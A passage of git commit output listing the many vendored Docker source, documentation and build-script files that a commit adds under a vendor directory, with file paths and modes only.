vendor/github.com/docker/docker/daemon/graphdriver/aufs/aufs_test.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/aufs/dirs.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/aufs/mount.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/aufs/mount_linux.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/aufs/mount_unsupported.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/btrfs/btrfs.go create mode 100644 
vendor/github.com/docker/docker/daemon/graphdriver/btrfs/btrfs_test.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/btrfs/dummy_unsupported.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/btrfs/version.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/btrfs/version_none.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/btrfs/version_test.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/counter.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/devmapper/README.md create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/devmapper/deviceset.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/devmapper/devmapper_doc.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/devmapper/devmapper_test.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/devmapper/driver.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/devmapper/mount.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/driver.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/driver_freebsd.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/driver_linux.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/driver_solaris.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/driver_unsupported.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/driver_windows.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/fsdiff.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/graphtest/graphbench_unix.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/graphtest/graphtest_unix.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/graphtest/graphtest_windows.go create mode 100644 
vendor/github.com/docker/docker/daemon/graphdriver/graphtest/testutil.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/graphtest/testutil_unix.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/overlay/copy.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/overlay/overlay.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/overlay/overlay_test.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/overlay/overlay_unsupported.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/overlay2/check.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/overlay2/mount.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/overlay2/overlay.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/overlay2/overlay_test.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/overlay2/overlay_unsupported.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/overlay2/randomid.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/overlayutils/overlayutils.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/plugin.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/proxy.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/quota/projectquota.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/register/register_aufs.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/register/register_btrfs.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/register/register_devicemapper.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/register/register_overlay.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/register/register_vfs.go create mode 100644 
vendor/github.com/docker/docker/daemon/graphdriver/register/register_windows.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/register/register_zfs.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/vfs/driver.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/vfs/vfs_test.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/windows/windows.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/zfs/MAINTAINERS create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_freebsd.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_linux.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_solaris.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_test.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_unsupported.go create mode 100644 vendor/github.com/docker/docker/daemon/health.go create mode 100644 vendor/github.com/docker/docker/daemon/health_test.go create mode 100644 vendor/github.com/docker/docker/daemon/image.go create mode 100644 vendor/github.com/docker/docker/daemon/image_delete.go create mode 100644 vendor/github.com/docker/docker/daemon/image_exporter.go create mode 100644 vendor/github.com/docker/docker/daemon/image_history.go create mode 100644 vendor/github.com/docker/docker/daemon/image_inspect.go create mode 100644 vendor/github.com/docker/docker/daemon/image_pull.go create mode 100644 vendor/github.com/docker/docker/daemon/image_push.go create mode 100644 vendor/github.com/docker/docker/daemon/image_tag.go create mode 100644 vendor/github.com/docker/docker/daemon/images.go create mode 100644 vendor/github.com/docker/docker/daemon/import.go create mode 100644 vendor/github.com/docker/docker/daemon/info.go create mode 100644 
vendor/github.com/docker/docker/daemon/info_unix.go create mode 100644 vendor/github.com/docker/docker/daemon/info_windows.go create mode 100644 vendor/github.com/docker/docker/daemon/initlayer/setup_solaris.go create mode 100644 vendor/github.com/docker/docker/daemon/initlayer/setup_unix.go create mode 100644 vendor/github.com/docker/docker/daemon/initlayer/setup_windows.go create mode 100644 vendor/github.com/docker/docker/daemon/inspect.go create mode 100644 vendor/github.com/docker/docker/daemon/inspect_solaris.go create mode 100644 vendor/github.com/docker/docker/daemon/inspect_unix.go create mode 100644 vendor/github.com/docker/docker/daemon/inspect_windows.go create mode 100644 vendor/github.com/docker/docker/daemon/keys.go create mode 100644 vendor/github.com/docker/docker/daemon/keys_unsupported.go create mode 100644 vendor/github.com/docker/docker/daemon/kill.go create mode 100644 vendor/github.com/docker/docker/daemon/links.go create mode 100644 vendor/github.com/docker/docker/daemon/links/links.go create mode 100644 vendor/github.com/docker/docker/daemon/links/links_test.go create mode 100644 vendor/github.com/docker/docker/daemon/links_linux.go create mode 100644 vendor/github.com/docker/docker/daemon/links_linux_test.go create mode 100644 vendor/github.com/docker/docker/daemon/links_notlinux.go create mode 100644 vendor/github.com/docker/docker/daemon/list.go create mode 100644 vendor/github.com/docker/docker/daemon/list_unix.go create mode 100644 vendor/github.com/docker/docker/daemon/list_windows.go create mode 100644 vendor/github.com/docker/docker/daemon/logdrivers_linux.go create mode 100644 vendor/github.com/docker/docker/daemon/logdrivers_windows.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/awslogs/cloudwatchlogs.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/awslogs/cloudwatchlogs_test.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/awslogs/cwlogsiface_mock_test.go create mode 
100644 vendor/github.com/docker/docker/daemon/logger/context.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/copier.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/copier_test.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/etwlogs/etwlogs_windows.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/factory.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/fluentd/fluentd.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/gcplogs/gcplogging.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/gelf/gelf.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/gelf/gelf_unsupported.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/journald/journald.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/journald/journald_test.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/journald/journald_unsupported.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/journald/read.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/journald/read_native.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/journald/read_native_compat.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/journald/read_unsupported.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonfilelog.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonfilelog_test.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/jsonfilelog/read.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/logentries/logentries.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/logger.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/logger_test.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/loggerutils/log_tag.go create mode 100644 
vendor/github.com/docker/docker/daemon/logger/loggerutils/log_tag_test.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/loggerutils/rotatefilewriter.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/splunk/splunk.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/splunk/splunk_test.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/splunk/splunkhecmock_test.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/syslog/syslog.go create mode 100644 vendor/github.com/docker/docker/daemon/logger/syslog/syslog_test.go create mode 100644 vendor/github.com/docker/docker/daemon/logs.go create mode 100644 vendor/github.com/docker/docker/daemon/logs_test.go create mode 100644 vendor/github.com/docker/docker/daemon/metrics.go create mode 100644 vendor/github.com/docker/docker/daemon/monitor.go create mode 100644 vendor/github.com/docker/docker/daemon/monitor_linux.go create mode 100644 vendor/github.com/docker/docker/daemon/monitor_solaris.go create mode 100644 vendor/github.com/docker/docker/daemon/monitor_windows.go create mode 100644 vendor/github.com/docker/docker/daemon/mounts.go create mode 100644 vendor/github.com/docker/docker/daemon/names.go create mode 100644 vendor/github.com/docker/docker/daemon/network.go create mode 100644 vendor/github.com/docker/docker/daemon/network/settings.go create mode 100644 vendor/github.com/docker/docker/daemon/oci_linux.go create mode 100644 vendor/github.com/docker/docker/daemon/oci_solaris.go create mode 100644 vendor/github.com/docker/docker/daemon/oci_windows.go create mode 100644 vendor/github.com/docker/docker/daemon/pause.go create mode 100644 vendor/github.com/docker/docker/daemon/prune.go create mode 100644 vendor/github.com/docker/docker/daemon/rename.go create mode 100644 vendor/github.com/docker/docker/daemon/resize.go create mode 100644 vendor/github.com/docker/docker/daemon/restart.go create mode 100644 
vendor/github.com/docker/docker/daemon/search.go create mode 100644 vendor/github.com/docker/docker/daemon/search_test.go create mode 100644 vendor/github.com/docker/docker/daemon/seccomp_disabled.go create mode 100644 vendor/github.com/docker/docker/daemon/seccomp_linux.go create mode 100644 vendor/github.com/docker/docker/daemon/seccomp_unsupported.go create mode 100644 vendor/github.com/docker/docker/daemon/secrets.go create mode 100644 vendor/github.com/docker/docker/daemon/secrets_linux.go create mode 100644 vendor/github.com/docker/docker/daemon/secrets_unsupported.go create mode 100644 vendor/github.com/docker/docker/daemon/selinux_linux.go create mode 100644 vendor/github.com/docker/docker/daemon/selinux_unsupported.go create mode 100644 vendor/github.com/docker/docker/daemon/start.go create mode 100644 vendor/github.com/docker/docker/daemon/start_unix.go create mode 100644 vendor/github.com/docker/docker/daemon/start_windows.go create mode 100644 vendor/github.com/docker/docker/daemon/stats.go create mode 100644 vendor/github.com/docker/docker/daemon/stats_collector.go create mode 100644 vendor/github.com/docker/docker/daemon/stats_collector_solaris.go create mode 100644 vendor/github.com/docker/docker/daemon/stats_collector_unix.go create mode 100644 vendor/github.com/docker/docker/daemon/stats_collector_windows.go create mode 100644 vendor/github.com/docker/docker/daemon/stats_unix.go create mode 100644 vendor/github.com/docker/docker/daemon/stats_windows.go create mode 100644 vendor/github.com/docker/docker/daemon/stop.go create mode 100644 vendor/github.com/docker/docker/daemon/top_unix.go create mode 100644 vendor/github.com/docker/docker/daemon/top_unix_test.go create mode 100644 vendor/github.com/docker/docker/daemon/top_windows.go create mode 100644 vendor/github.com/docker/docker/daemon/unpause.go create mode 100644 vendor/github.com/docker/docker/daemon/update.go create mode 100644 vendor/github.com/docker/docker/daemon/update_linux.go create 
mode 100644 vendor/github.com/docker/docker/daemon/update_solaris.go create mode 100644 vendor/github.com/docker/docker/daemon/update_windows.go create mode 100644 vendor/github.com/docker/docker/daemon/volumes.go create mode 100644 vendor/github.com/docker/docker/daemon/volumes_unit_test.go create mode 100644 vendor/github.com/docker/docker/daemon/volumes_unix.go create mode 100644 vendor/github.com/docker/docker/daemon/volumes_windows.go create mode 100644 vendor/github.com/docker/docker/daemon/wait.go create mode 100644 vendor/github.com/docker/docker/daemon/workdir.go create mode 100644 vendor/github.com/docker/docker/distribution/config.go create mode 100644 vendor/github.com/docker/docker/distribution/errors.go create mode 100644 vendor/github.com/docker/docker/distribution/fixtures/validate_manifest/bad_manifest create mode 100644 vendor/github.com/docker/docker/distribution/fixtures/validate_manifest/extra_data_manifest create mode 100644 vendor/github.com/docker/docker/distribution/fixtures/validate_manifest/good_manifest create mode 100644 vendor/github.com/docker/docker/distribution/metadata/metadata.go create mode 100644 vendor/github.com/docker/docker/distribution/metadata/v1_id_service.go create mode 100644 vendor/github.com/docker/docker/distribution/metadata/v1_id_service_test.go create mode 100644 vendor/github.com/docker/docker/distribution/metadata/v2_metadata_service.go create mode 100644 vendor/github.com/docker/docker/distribution/metadata/v2_metadata_service_test.go create mode 100644 vendor/github.com/docker/docker/distribution/pull.go create mode 100644 vendor/github.com/docker/docker/distribution/pull_v1.go create mode 100644 vendor/github.com/docker/docker/distribution/pull_v2.go create mode 100644 vendor/github.com/docker/docker/distribution/pull_v2_test.go create mode 100644 vendor/github.com/docker/docker/distribution/pull_v2_unix.go create mode 100644 vendor/github.com/docker/docker/distribution/pull_v2_windows.go create mode 100644 
vendor/github.com/docker/docker/distribution/push.go create mode 100644 vendor/github.com/docker/docker/distribution/push_v1.go create mode 100644 vendor/github.com/docker/docker/distribution/push_v2.go create mode 100644 vendor/github.com/docker/docker/distribution/push_v2_test.go create mode 100644 vendor/github.com/docker/docker/distribution/registry.go create mode 100644 vendor/github.com/docker/docker/distribution/registry_unit_test.go create mode 100644 vendor/github.com/docker/docker/distribution/utils/progress.go create mode 100644 vendor/github.com/docker/docker/distribution/xfer/download.go create mode 100644 vendor/github.com/docker/docker/distribution/xfer/download_test.go create mode 100644 vendor/github.com/docker/docker/distribution/xfer/transfer.go create mode 100644 vendor/github.com/docker/docker/distribution/xfer/transfer_test.go create mode 100644 vendor/github.com/docker/docker/distribution/xfer/upload.go create mode 100644 vendor/github.com/docker/docker/distribution/xfer/upload_test.go create mode 100644 vendor/github.com/docker/docker/dockerversion/useragent.go create mode 100644 vendor/github.com/docker/docker/dockerversion/version_lib.go create mode 100644 vendor/github.com/docker/docker/docs/README.md create mode 100644 vendor/github.com/docker/docker/docs/api/v1.18.md create mode 100644 vendor/github.com/docker/docker/docs/api/v1.19.md create mode 100644 vendor/github.com/docker/docker/docs/api/v1.20.md create mode 100644 vendor/github.com/docker/docker/docs/api/v1.21.md create mode 100644 vendor/github.com/docker/docker/docs/api/v1.22.md create mode 100644 vendor/github.com/docker/docker/docs/api/v1.23.md create mode 100644 vendor/github.com/docker/docker/docs/api/v1.24.md create mode 100644 vendor/github.com/docker/docker/docs/api/version-history.md create mode 100644 vendor/github.com/docker/docker/docs/deprecated.md create mode 100644 vendor/github.com/docker/docker/docs/extend/EBS_volume.md create mode 100644 
vendor/github.com/docker/docker/docs/extend/config.md create mode 100644 vendor/github.com/docker/docker/docs/extend/images/authz_additional_info.png create mode 100644 vendor/github.com/docker/docker/docs/extend/images/authz_allow.png create mode 100644 vendor/github.com/docker/docker/docs/extend/images/authz_chunked.png create mode 100644 vendor/github.com/docker/docker/docs/extend/images/authz_connection_hijack.png create mode 100644 vendor/github.com/docker/docker/docs/extend/images/authz_deny.png create mode 100644 vendor/github.com/docker/docker/docs/extend/index.md create mode 100644 vendor/github.com/docker/docker/docs/extend/legacy_plugins.md create mode 100644 vendor/github.com/docker/docker/docs/extend/plugin_api.md create mode 100644 vendor/github.com/docker/docker/docs/extend/plugins_authorization.md create mode 100644 vendor/github.com/docker/docker/docs/extend/plugins_graphdriver.md create mode 100644 vendor/github.com/docker/docker/docs/extend/plugins_network.md create mode 100644 vendor/github.com/docker/docker/docs/extend/plugins_volume.md create mode 100644 vendor/github.com/docker/docker/docs/reference/builder.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/attach.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/build.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/cli.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/commit.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/container_prune.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/cp.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/create.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/deploy.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/diff.md create mode 100644 
vendor/github.com/docker/docker/docs/reference/commandline/docker_images.gif create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/dockerd.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/events.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/exec.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/export.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/history.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/image_prune.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/images.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/import.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/index.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/info.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/inspect.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/kill.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/load.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/login.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/logout.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/logs.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/menu.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/network_connect.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/network_create.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/network_disconnect.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/network_inspect.md create mode 100644 
vendor/github.com/docker/docker/docs/reference/commandline/network_ls.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/network_prune.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/network_rm.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/node_demote.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/node_inspect.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/node_ls.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/node_promote.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/node_ps.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/node_rm.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/node_update.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/pause.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/plugin_create.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/plugin_disable.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/plugin_enable.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/plugin_inspect.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/plugin_install.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/plugin_ls.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/plugin_push.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/plugin_rm.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/plugin_set.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/plugin_upgrade.md create mode 100644 
vendor/github.com/docker/docker/docs/reference/commandline/port.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/ps.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/pull.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/push.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/rename.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/restart.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/rm.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/rmi.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/run.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/save.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/search.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/secret_create.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/secret_inspect.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/secret_ls.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/secret_rm.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/service_create.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/service_inspect.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/service_logs.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/service_ls.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/service_ps.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/service_rm.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/service_scale.md create mode 100644 
vendor/github.com/docker/docker/docs/reference/commandline/service_update.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/stack_deploy.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/stack_ls.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/stack_ps.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/stack_rm.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/stack_services.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/start.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/stats.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/stop.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/swarm_init.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/swarm_join.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/swarm_join_token.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/swarm_leave.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/swarm_unlock.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/swarm_unlock_key.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/swarm_update.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/system_df.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/system_prune.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/tag.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/top.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/unpause.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/update.md create 
mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/version.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/volume_create.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/volume_inspect.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/volume_ls.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/volume_prune.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/volume_rm.md create mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/wait.md create mode 100644 vendor/github.com/docker/docker/docs/reference/glossary.md create mode 100644 vendor/github.com/docker/docker/docs/reference/index.md create mode 100644 vendor/github.com/docker/docker/docs/reference/run.md create mode 100644 vendor/github.com/docker/docker/docs/static_files/contributors.png create mode 100644 vendor/github.com/docker/docker/docs/static_files/docker-logo-compressed.png create mode 100644 vendor/github.com/docker/docker/experimental/README.md create mode 100644 vendor/github.com/docker/docker/experimental/checkpoint-restore.md create mode 100644 vendor/github.com/docker/docker/experimental/docker-stacks-and-bundles.md create mode 100644 vendor/github.com/docker/docker/experimental/images/ipvlan-l3.gliffy create mode 100644 vendor/github.com/docker/docker/experimental/images/ipvlan-l3.png create mode 100644 vendor/github.com/docker/docker/experimental/images/ipvlan-l3.svg create mode 100644 vendor/github.com/docker/docker/experimental/images/ipvlan_l2_simple.gliffy create mode 100644 vendor/github.com/docker/docker/experimental/images/ipvlan_l2_simple.png create mode 100644 vendor/github.com/docker/docker/experimental/images/ipvlan_l2_simple.svg create mode 100644 vendor/github.com/docker/docker/experimental/images/macvlan-bridge-ipvlan-l2.gliffy create mode 100644 
vendor/github.com/docker/docker/experimental/images/macvlan-bridge-ipvlan-l2.png create mode 100644 vendor/github.com/docker/docker/experimental/images/macvlan-bridge-ipvlan-l2.svg create mode 100644 vendor/github.com/docker/docker/experimental/images/multi_tenant_8021q_vlans.gliffy create mode 100644 vendor/github.com/docker/docker/experimental/images/multi_tenant_8021q_vlans.png create mode 100644 vendor/github.com/docker/docker/experimental/images/multi_tenant_8021q_vlans.svg create mode 100644 vendor/github.com/docker/docker/experimental/images/vlans-deeper-look.gliffy create mode 100644 vendor/github.com/docker/docker/experimental/images/vlans-deeper-look.png create mode 100644 vendor/github.com/docker/docker/experimental/images/vlans-deeper-look.svg create mode 100644 vendor/github.com/docker/docker/experimental/vlan-networks.md create mode 100644 vendor/github.com/docker/docker/hack/Jenkins/W2L/postbuild.sh create mode 100644 vendor/github.com/docker/docker/hack/Jenkins/W2L/setup.sh create mode 100644 vendor/github.com/docker/docker/hack/Jenkins/readme.md create mode 100755 vendor/github.com/docker/docker/hack/dind create mode 100755 vendor/github.com/docker/docker/hack/dockerfile/binaries-commits create mode 100755 vendor/github.com/docker/docker/hack/dockerfile/install-binaries.sh create mode 100755 vendor/github.com/docker/docker/hack/generate-authors.sh create mode 100755 vendor/github.com/docker/docker/hack/generate-swagger-api.sh create mode 100644 vendor/github.com/docker/docker/hack/install.sh create mode 100644 vendor/github.com/docker/docker/hack/make.ps1 create mode 100755 vendor/github.com/docker/docker/hack/make.sh create mode 100644 vendor/github.com/docker/docker/hack/make/.binary create mode 100644 vendor/github.com/docker/docker/hack/make/.binary-setup create mode 100644 vendor/github.com/docker/docker/hack/make/.build-deb/compat create mode 100644 vendor/github.com/docker/docker/hack/make/.build-deb/control create mode 100644 
vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.bash-completion create mode 120000 vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.docker.default create mode 120000 vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.docker.init create mode 120000 vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.docker.upstart create mode 100644 vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.install create mode 100644 vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.manpages create mode 100644 vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.postinst create mode 120000 vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.udev create mode 100644 vendor/github.com/docker/docker/hack/make/.build-deb/docs create mode 100755 vendor/github.com/docker/docker/hack/make/.build-deb/rules create mode 100644 vendor/github.com/docker/docker/hack/make/.build-rpm/docker-engine-selinux.spec create mode 100644 vendor/github.com/docker/docker/hack/make/.build-rpm/docker-engine.spec create mode 100644 vendor/github.com/docker/docker/hack/make/.detect-daemon-osarch create mode 100644 vendor/github.com/docker/docker/hack/make/.ensure-emptyfs create mode 100644 vendor/github.com/docker/docker/hack/make/.go-autogen create mode 100644 vendor/github.com/docker/docker/hack/make/.go-autogen.ps1 create mode 100644 vendor/github.com/docker/docker/hack/make/.integration-daemon-setup create mode 100644 vendor/github.com/docker/docker/hack/make/.integration-daemon-start create mode 100644 vendor/github.com/docker/docker/hack/make/.integration-daemon-stop create mode 100644 vendor/github.com/docker/docker/hack/make/.integration-test-helpers create mode 100644 vendor/github.com/docker/docker/hack/make/.resources-windows/common.rc create mode 100644 vendor/github.com/docker/docker/hack/make/.resources-windows/docker.exe.manifest create mode 100644 
